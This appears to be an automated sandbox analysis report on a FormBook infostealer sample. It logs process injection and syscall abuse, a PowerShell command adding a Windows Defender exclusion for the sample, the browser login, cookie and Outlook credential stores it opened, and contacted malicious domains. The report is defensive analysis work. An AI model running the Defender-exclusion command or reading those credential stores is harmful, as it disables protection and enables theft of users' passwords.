            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\r9856_7.exeMemory written: C:\Users\user\Desktop\r9856_7.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: NULL target: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmdkey.exeThread register set: target process: 7660Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmdkey.exeThread APC queued: target process: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"Jump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: NhrnLLOsLetD.exe, 00000007.00000000.1469765069.0000000001121000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3815745438.0000000001120000.00000002.00000001.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000000.1611659282.0000000001A71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\r9856_7.exeQueries volume information: C:\Users\user\Desktop\r9856_7.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1509673 Sample: r9856_7.exe Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 37 www.zimra.xyz 2->37 39 www.personal-loans-jp8.xyz 2->39 41 23 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 57 7 other signatures 2->57 10 r9856_7.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 39->55 process4 file5 35 C:\Users\user\AppData\...\r9856_7.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 r9856_7.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 NhrnLLOsLetD.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 cmdkey.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 NhrnLLOsLetD.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 jeandreo.store 162.240.81.18, 59690, 59691, 59692 